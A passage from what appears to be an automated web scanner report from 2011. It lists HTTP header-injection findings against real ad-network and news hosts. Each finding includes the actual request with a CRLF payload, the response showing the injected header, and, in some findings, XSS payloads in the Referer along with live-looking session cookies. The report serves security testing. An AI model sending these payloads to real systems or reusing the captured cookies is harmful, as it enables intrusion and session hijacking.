Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;239897814;0-0;1;55848032;24/24;41985765/42003552/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;pc2=1;ic2=1;sz=24x24;dcmt=text/html;;6e37b
fb30a1b7521
=1;~cs=v:
Date: Tue, 10 May 2011 13:13:07 GMT
Content-Length: 1225

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;239897814;0-0;1;55848032;24/24;41985765/42003552/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;i
...[SNIP]...

3.33. http://ad.doubleclick.net/pfadx/philly_cim/ [secure parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /pfadx/philly_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 2f8b8%0d%0a9f03c22d42c was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/philly_cim/;secure=2f8b8%0d%0a9f03c22d42c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=philly
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 10 May 2011 13:12:01 GMT
Expires: Tue, 10 May 2011 13:12:01 GMT
DCLK_imp: v7;x;44306;0-0;0;55848032;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=2f8b8
9f03c22d42c
;~cs=s:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b03/0/0/%2a/r;44306;0-0;0;55848032;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

3.34. http://amch.questionmarket.com/adscgen/sta.php [code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 50692%0d%0a9754cdb8dea was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=887938&site=2378235&code=487810250692%0d%0a9754cdb8dea&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1

Response

HTTP/1.1 302 Found
Date: Tue, 10 May 2011 14:25:18 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a209.dl
Set-Cookie: CS1=887938-1-1; expires=Sat, 30-Jun-2012 06:25:18 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-L$/(M-0; expires=Sat, 30-Jun-2012 06:25:18 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=887938&site=36-2378235-&code=487810250692
9754cdb8dea

Content-Length: 34
Content-Type: text/html

/* /adsc/d887938/36/-1/randm.js */

3.35. http://amch.questionmarket.com/adscgen/sta.php [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/sta.php

Issue detail

The value of the site request parameter is copied into the Location response header. The payload eb267%0d%0a23d381da87d was submitted in the site parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=887938&site=eb267%0d%0a23d381da87d&code=4878102&ut_sys=eb HTTP/1.1
Host: amch.questionmarket.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1

Response

HTTP/1.1 302 Found
Date: Tue, 10 May 2011 14:24:29 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a231.dl
Set-Cookie: CS1=887938-1-1; expires=Sat, 30-Jun-2012 06:24:29 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=887938-x#/(M-0; expires=Sat, 30-Jun-2012 06:24:29 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=eb&survey_num=887938&site=-1-eb267
23d381da87d
-&code=4878102
Content-Length: 44
Content-Type: text/html

/* /adsc/d887938/-1/500004878102/randm.js */

3.36. http://bidder.mathtag.com/iframe/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload dc7ea%0d%0a298f1c0e803 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=dc7ea%0d%0a298f1c0e803&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNjg3NDIzNDk3MDk2NDAzNjAvMTE1MDAzLzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHV2N2NlUVNRWmNITnVfclJ1S0tBS28v/vEV5FyPu2ISYlluSJbgs6DJemzY&price=Tck9qAAIETkK7F2h1e88yFrVKAuunn27bfXY2A&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBM6R_qD3JTbmiIKG7sQfI-byvDdzvj_EB5PW9vBH454OTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03NTg3MzE0MjU0MDkyMjQ4oAHg6pnsA7IBFnd3dy5rbm93eW91cm1vYmlsZS5jb226AQk3Mjh4OTBfYXPIAQnaAXNodHRwOi8vd3d3Lmtub3d5b3VybW9iaWxlLmNvbS9mZWF0dXJlc2ViMDFiJTIyLWFsZXJ0KCUyMlhTUyUyMiktJTIyYzFkM2E1OGY5OGEvODgxNzQwL2dvb2dsZV9pb193aGF0X3RvX2V4cGVjdC5odG1smALuCsACBMgC1sGMDqgDAegDrwjoA4YD6ANO6AOvAvUDBgAAxIAGqcqGqrbH1Jtb%26num%3D1%26sig%3DAGiWqtzW5hpUbFxB3gelMXQv-DmJv8ZmTA%26client%3Dca-pub-7587314254092248%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7587314254092248&output=html&h=90&slotname=9491098414&w=728&lmt=1305052151&flash=10.2.154&url=http%3A%2F%2Fwww.knowyourmobile.com%2Ffeatureseb01b%2522-alert(%2522XSS%2522)-%2522c1d3a58f98a%2F881740%2Fgoogle_io_what_to_expect.html&dt=1305034151054&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=6665882529&correlator=1305034136711&frm=0&adk=3935617407&ga_vid=1292799472.1305033311&ga_sid=1305033311&ga_hid=1941275286&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=951&ref=http%3A%2F%2Fburp%2Fshow%2F12&fu=0&ifi=2&dtd=56&xpc=mB7TCo5i79&p=http%3A//www.knowyourmobile.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1305033341; mt_mop=10004:1305033341|4:1305033320

Response

HTTP/1.1 404 Not found
Date: Tue, 10 May 2011 14:02:44 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - dc7ea
298f1c0e803

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

3.37. http://bidder.mathtag.com/notify [exch parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bidder.mathtag.com
Path:   /notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 68687%0d%0aa56fdd7572e was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=68687%0d%0aa56fdd7572e&id=5aW95q2jLzEvWVdNMVlXWmxPRGt0WkdKbE15MDBZVGs1TFRsak5qQXROVGxtTkdaaU5EazFZMkk1L05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy81NjU3MTY4NzExMDE4MDYzOS8xMTUwMDIvMTAwNDcwLzIvUTNBbV9DbnBmUVVnTncyOVZSNGhUaExDNUJ2ZDlwZFdUeXJ0ZExOblVpYy8/yud4hlXv4H9X9GSrDaYFPckyYXo&price=7.185200 HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo?t=1305033240941&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304957840; ts=1305033239

Response

HTTP/1.1 404 Not found
Date: Tue, 10 May 2011 13:25:01 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 68687
a56fdd7572e

x-mm-host: ewr-bidder-x1
Connection: keep-alive

Request not found

3.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the flv request parameter is copied into the Set-Cookie response header. The payload e4909%0d%0aa1382fbc11a was submitted in the flv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=e4909%0d%0aa1382fbc11a&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=d14259c0-4e0c-443e-b352-a1e8fb4065ba3I0060; expires=Mon, 08-Aug-2011 10:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=e4909
a1382fbc11a
&RES=128&WMPV=0; expires=Mon, 08-Aug-2011 10: 31:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:24 GMT
Connection: close
Content-Length: 0


3.39. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the res request parameter is copied into the Set-Cookie response header. The payload 2240b%0d%0ae3c9c429ade was submitted in the res parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=0&wmpv=0&res=2240b%0d%0ae3c9c429ade HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=377eeade-84a3-4f19-a129-ab5e2e6932fa3I0090; expires=Mon, 08-Aug-2011 10:31:26 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=2240b
e3c9c429ade
&WMPV=0; expires=Mon, 08-Aug-2011 10: 31:26 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:26 GMT
Connection: close
Content-Length: 0


3.40. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the wmpv request parameter is copied into the Set-Cookie response header. The payload 2d122%0d%0ad16c5480c76 was submitted in the wmpv parameter. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=int&iv=2&int=4878102~~0~~~^ebAboveTheFold~0~0~01020^ebAdDuration~416~0~01020^ebAboveTheFoldDuration~416~0~01020&OptOut=0&ebRandom=0.4362495185382129&flv=0&wmpv=2d122%0d%0ad16c5480c76&res=128 HTTP/1.1
Host: bs.serving-sys.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.philly.com/philly/news/nation_world/121548659.html?ef135%27%3balert(document.cookie)//4b169261d24=1
Origin: http://www.philly.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: u2=053133e7-d2a3-4d34-8410-525610354b8f3I0020; expires=Mon, 08-Aug-2011 10:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=FLV=0&RES=128&WMPV=2d122
d16c5480c76
; expires=Mon, 08-Aug-2011 10: 31:25 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 10 May 2011 14:31:25 GMT
Connection: close
Content-Length: 0


3.41. http://c7.zedo.com/bar/v16-406/c5/jsc/fmr.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-406/c5/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload 8afe9%0d%0aaf29ca98fb5 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/c5/jsc/fmr.js?c=4479/4088/1&a=0&f=&n=305&r=13&d=15&q=&$=8afe9%0d%0aaf29ca98fb5&s=1128&z=0.20179314771667123 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:8afe9
af29ca98fb5
;expires=Wed, 11 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,4479,15;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Wed, 11 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#940496|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1;expires=Thu, 09 Jun 2011 13:25:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFSkp=305,4479,15,1:;expires=Wed, 11 May 2011 05:00:00 GMT;path=/;domain=.zedo.com;
ETag: "90e70110-8181-4a1e245688080"
Vary: Accept-Encoding
X-Varnish: 545954342 545954007
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=391
Expires: Tue, 10 May 2011 13:32:03 GMT
Date: Tue, 10 May 2011 13:25:32 GMT
Connection: close
Content-Length: 7326

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1128;var zzPat=',8afe9
...[SNIP]...

3.42. http://c7.zedo.com/utils/ecSet.js [v parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 3489c%0d%0ac03fe54ce09 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=3489c%0d%0ac03fe54ce09&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; PI=h1023448Za926090Zc305005676%2C305005676Zs1423Zt1129; ZCBC=1; FFSkp=305,4479,15,1:; FFcat=305,4479,15; FFad=0; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968:305,4479#945899|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1:0,18,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 3489c
c03fe54ce09
;expires=Thu, 09 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=3708
Date: Tue, 10 May 2011 13:25:34 GMT
Connection: close



3.43. http://d.xp1.ru4.com/activity [redirect parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /activity

Issue detail

The value of the redirect request parameter is copied into the Location response header. The payload da244%0d%0a0f6a8658bab was submitted in the redirect parameter. This caused a response containing an injected HTTP header.

Request

GET /activity?_o=62795&_t=cm_admeld&redirect=da244%0d%0a0f6a8658bab&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/607/salonmedia/300x250/default_criteo?t=1305033240941&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AM-00000000030620452; O1807966=16; P1807966=c3N2X2MyfFl8MTMwNDM2MDM2MHxzc3ZfYnxjMnwxMzA0MzYwMzYwfHNzdl8xfDI4NTQ0NTQ3M3wxMzA0MzYwMzYwfA==

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-Java-System-Web-Server/7.0
Date: Tue, 10 May 2011 13:25:07 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Pragma: no-cache
Set-cookie: O62795=0; domain=.ru4.com; path=/; expires=Mon, 01-Jan-1970 12:00:00 GMT
Location: http://da244
0f6a8658bab
?admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=303&admeld_call_type=redirect&admeld_callback=http://tag.admeld.com/match
Content-length: 0
Connection: close


3.44. http://politics.gather.com/js/commenting.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /js/commenting.js

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 9695a%0d%0a1f4ecfd236 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/9695a%0d%0a1f4ecfd236?18185 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7529E6AE6191662AF7FFA12DC6E30990; vis=IL3kPIJ/j/1xZedPQlMWF0oRm+S8xbqzecbX6qOuxS2uZgZwvNHVrznIDPkUuypt2qw+TToQII1aLPO5TlnGt8iivc5mAOxZDlGv2Bt4jLT4QxKKwJ+ccFL7YaPHe2QR; gathersid=www07

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:16:51 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Location: http://www.gather.com/js/9695a
1f4ecfd236

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.45. http://politics.gather.com/js/siteReport.js.jspf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /js/siteReport.js.jspf

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 68430%0d%0a6eb91d66aab was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /js/68430%0d%0a6eb91d66aab?18185 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
Referer: http://politics.gather.com/viewArticle.action?articleId=281474979309848
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=7529E6AE6191662AF7FFA12DC6E30990; vis=IL3kPIJ/j/1xZedPQlMWF0oRm+S8xbqzecbX6qOuxS2uZgZwvNHVrznIDPkUuypt2qw+TToQII1aLPO5TlnGt8iivc5mAOxZDlGv2Bt4jLT4QxKKwJ+ccFL7YaPHe2QR; gathersid=www07

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 10 May 2011 13:16:42 GMT
Server: Apache/2.2.15 (Unix) mod_jk/1.2.28
Location: http://www.gather.com/js/68430
6eb91d66aab

Content-Length: 0
Content-Type: text/html;charset=UTF-8


3.46. http://politics.gather.com/viewArticle.action [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://politics.gather.com
Path:   /viewArticle.action

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d1c40%0d%0ada2b4770962 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d1c40%0d%0ada2b4770962?articleId=281474979309848 HTTP/1.1
Host: politics.gather.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

